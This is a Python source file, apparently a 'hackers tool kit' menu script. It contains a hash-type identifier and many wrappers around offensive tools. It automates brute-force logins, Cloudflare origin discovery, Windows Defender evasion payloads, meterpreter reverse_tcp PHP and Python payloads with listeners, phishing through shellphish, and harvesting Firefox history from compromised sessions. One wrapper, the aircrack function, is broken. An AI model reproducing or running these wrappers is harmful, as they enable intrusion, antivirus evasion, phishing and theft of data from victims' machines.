hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - 